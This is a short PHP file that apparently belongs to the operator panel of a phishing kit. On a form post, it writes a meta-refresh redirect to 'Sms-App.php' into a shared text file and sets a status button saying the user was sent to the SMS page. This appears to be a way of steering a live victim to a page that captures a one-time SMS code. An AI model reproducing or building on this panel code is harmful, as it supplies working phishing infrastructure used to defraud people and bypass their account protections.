<?php


session_start();

if(isset($_POST['textredirectsms'])) 
{
    
$Page .= ' <meta http-equiv="refresh" content="0;url=./Sms-App.php" />  ';

$fPage = fopen("../Show_system/Show_PageCode.txt", "w");
    fwrite($fPage, $Page);



$Pag .= ' <div class="expanded button-group"><input type="submit" value="✅ User go this Page From PO IN Sms 💯" class="button" style="
    background: #8bc34a;
"></div>';

$fPag = fopen("../Show_system/Show_Select.txt", "w");
    fwrite($fPag, $Pag);


header("location:../Select.php");


}

else {




}

?>
